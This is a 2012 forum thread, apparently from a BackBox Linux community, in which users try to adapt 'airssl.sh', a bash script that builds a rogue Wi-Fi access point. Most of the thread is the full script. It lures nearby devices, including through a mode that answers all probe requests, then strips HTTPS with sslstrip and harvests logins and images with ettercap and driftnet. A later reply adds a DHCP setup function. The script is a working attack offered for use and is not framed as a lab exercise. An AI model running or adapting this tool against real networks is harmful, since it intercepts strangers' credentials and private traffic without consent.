Author Topic: Can anyone get thi script to work properly on Backbox? airssl.sh  (Read 6036 times)

n1tr0g3n_0x1d3

  • Newbie
  • *
  • Posts: 48
  • n1tr0g3n
    • View Profile
    • n1tr0g3n's Network Security Blog
This is an Fake AP creator which runs sslstrip which would be nice to see 100% running on Backbox, it's almost working as is though.


Here's the link to the script   http://hitman-pt.zzl.org/downloads/airssl.sh

And here is a post about the script it's self and how to configure it..  http://hitmanpt.wordpress.com/2011/01/29/backtrack-fake-wifi-ap/

It was made for crapTrack but should be easily fixed to run on Backbox I'm pretty sure if you are good at bash scripting. Any help would be appreciated Thnaks guys..


I tried to get it working but no luck... Thanks again for your help.



ostendali

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 587
    • View Profile
This script is customized for BT...
it is very simple script and can be easily adapted to backbox, but who are the owners?
do you know them.....because we can't manipulate it by adapting to our system without their consensus hence it has not been declared any license on it.....
when there are no license declared the app is automatically proprietary....
where did you get this script if may I ask?



n1tr0g3n_0x1d3

  • Newbie
  • *
  • Posts: 48
  • n1tr0g3n
    • View Profile
    • n1tr0g3n's Network Security Blog
This guy seems to be the originator of the script    killadaninja  over on the BT forums but it would be safe to say we couldn't ask about anything with the word backbox in it over at the BT forums because the admins might have a small heart attack and need to be rushed to the nearest emergency room LOL   ;D much less the message never make it to him because of moderation hating lol Would be awesome to see it running on Bbox though. Hope we can figure something out   :)  Thanks for the quick reply ostendali
« Last Edit: March 23, 2012, 11:35:05 AM by n1tr0g3n_0x1d3 »



ostendali

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 587
    • View Profile
actually it is not big deal to re-write a script like that.....
but don't want to give the idea that it is copied from this one...
so, will think about and see what we can do regardless...



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
This is an Fake AP creator which runs sslstrip which would be nice to see 100% running on Backbox, it's almost working as is though.


Here's the link to the script   http://hitman-pt.zzl.org/downloads/airssl.sh["/color]

And here is a post about the script it's self and how to configure it..   http://hitmanpt.wordpress.com/2011/01/29/backtrack-fake-wifi-ap/

It was made for crapTrack but should be easily fixed to run on Backbox I'm pretty sure if you are good at bash scripting. Any help would be appreciated Thnaks guys..


I tried to get it working but no luck... Thanks again for your help.
Se vuoi io ho scritto una cosa molto simile... Ha qualche problemino nel caricare il dhcpd.conf e non so se è un problema mio o un bug, visto che in rete ho trovato errori simili ma con le più disperate soluzioni... Se lo vuoi mi fai pure da "tester" per il resto funziona abbastanza...

Edit: in realtà no, ti ho detto una cazzata, ho letto tutto lo script, il mio prepara karma e il server dhcp e te lo carica in metasploit, per metà è uguale, cambia l'ultima parte quando fa partire ettercap che a me non serve, ma se prendi metà di questo e metà di un altro script che ho postato per lo sniff con sslstrip e arpspoof ci tiri fuori quasi la stessa cosa... O se vuoi ne riscriviamo uno da capo che tanto è semplice!
« Last Edit: March 23, 2012, 01:29:55 PM by weVeg »

una voce libera è sempre liberatrice
under_r00t


n1tr0g3n_0x1d3

  • Newbie
  • *
  • Posts: 48
  • n1tr0g3n
    • View Profile
    • n1tr0g3n's Network Security Blog


Ok I'm about 98% complete with the Airssl script working completely on Backbox. The only problem I am having is that I can't obtain an IP after connecting to the Fake AP. I put a lot of time into editing this script and it's been on my mind for a while as to getting it working on backbox. I haven't had much help on it at all and no one seems to be willing to get this script converted for BB. I think it would be great to have a Fake AP generator that takes about 15 seconds to set up and which sniffs SSL logins and runs urlsnarf along with driftnet. I din't create the script but I have dreams to one day having it working on Backnox. If anyone can point out the issue in the script that's giving me the headache it would be greatly appreciated. i'm not looking for a handout since I've spent about 10 hours editing & researching about creating Fake Ap's and all to be able to understand the script and get it working. It wasn't easy to get it running this good and it was missing a few lines right off the bat that stopped the script from creating the interface plus it was written to use tap interface at0 and I changed it to use mon0 as the Alfa card uses. Hope the community can get this running with me as it would be an early Christmas gift and be an awesome script for the community  to enjoy  : )  Just hoping someone sees that I have tried to get this script 100% but I'm stuck between lines #108  &   #110 and think this is where the problem lies.  Here's the edited script below for you to test out and see this has some huge potential.

I would think that the line option domain-name-servers 10.0.0.1;  should be set something like 8.8.8.8 or 4.2.2.2 as well.


https://www.onlinefilefolder.com/4sqxnjzcqZ7ZZi




#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/backbox/wireless_analysis/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /backbox/wireless_analysis/airssl/dhcpd.conf

# Fake ap setup
echo "
  • Configuring FakeAP...."

echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
 

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "
  • Starting FakeAP..."

xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "
  • Starting FakeAP..."

xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -v -e "$ESSID" -c 11 -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi


if [ $ANSWER = "n" ] ; then
echo
echo "
  • Starting FakeAP..."

xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "
  • Configuring forwarding tables..."

ifconfig lo up
ifconfig mon0 up &
sleep 1
ifconfig mon0 10.0.0.1 netmask 255.255.255.0
ifconfig mon0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface mon0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "
  • Setting up DHCP..."

touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/backbox/wireless_analysis/airssl/dhcpd.conf" mon0 & dchpid=$!
sleep 3

# Sslstrip
echo "
  • Starting sslstrip..."

xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "
  • Configuring ettercap..."

echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "
  • Starting ettercap..."

xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i mon0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "
  • Starting ettercap..."

xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i mon0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "
  • Driftnet?"

echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "
  • Starting driftnet..."

driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "
  • Activated..."

echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "
  • IMPORTANT..."

echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "
  • Cleaning up airssl and resetting iptables..."


kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "
  • Clean up successful..."

echo "
  • Thank you for using airssl, Good Bye..."

exit

fi
exit



« Last Edit: August 15, 2012, 08:27:31 PM by n1tr0g3n_0x1d3 »



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
look: http://pastebin.com/jbeALQDf

this is function that i use to configure server dhcp, i have worked hard 'cause the config file must be saved on /etc/dhcp/ , change folder!!! and write it line by line!

dh_conf="/etc/dhcp/dhcpdevi.conf" ;

i_man="wlan0" ;
i_mon="mon0" ;
essid="TEST" ;
net="10.0.0.0" ;
net_mask="255.255.255.0" ;
ip_ap="10.0.0.1" ;
fun_dhcp () {
        if [ -e $dh_conf ]
                then
                        echo
                        echo "[ok] dh_conf presente"
                else
                        echo
                        echo "sto scrivendo il file di configurazione"
                        touch $dh_conf  
                        echo "option domain-name-servers $ip_ap ;" >> $dh_conf
                        echo "default-lease-time 60;" >> $dh_conf
                        echo "max-lease-time 7200;" >> $dh_conf
                        echo "ddns-update-style none;" >> $dh_conf
                        echo "authoritative;" >> $dh_conf
                        echo "log-facility local7;" >> $dh_conf
                        echo "subnet $net netmask $net_mask {" >> $dh_conf
                        echo "range 10.0.0.50 10.0.0.254;" >> $dh_conf
                        echo "option routers $ip_ap ;" >> $dh_conf
                        echo "option domain-name-servers $ip_ap ;" >> $dh_conf
                        echo "}" >> $dh_conf
                        sudo chmod 777 $dh_conf
        fi
        }
« Last Edit: August 15, 2012, 10:03:41 PM by weVeg »

una voce libera è sempre liberatrice
under_r00t